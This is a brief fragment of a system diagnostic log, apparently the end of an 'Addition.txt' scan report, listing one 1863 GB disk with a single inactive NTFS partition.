Disk: 3 (MBR Code: Windows 7/8/10) (Size: 1863 GB) (Disk ID: 00738CFB)
Partition 1: (Not Active) - (Size=1863 GB) - (Type=07 NTFS)

==================== End of Addition.txt =======================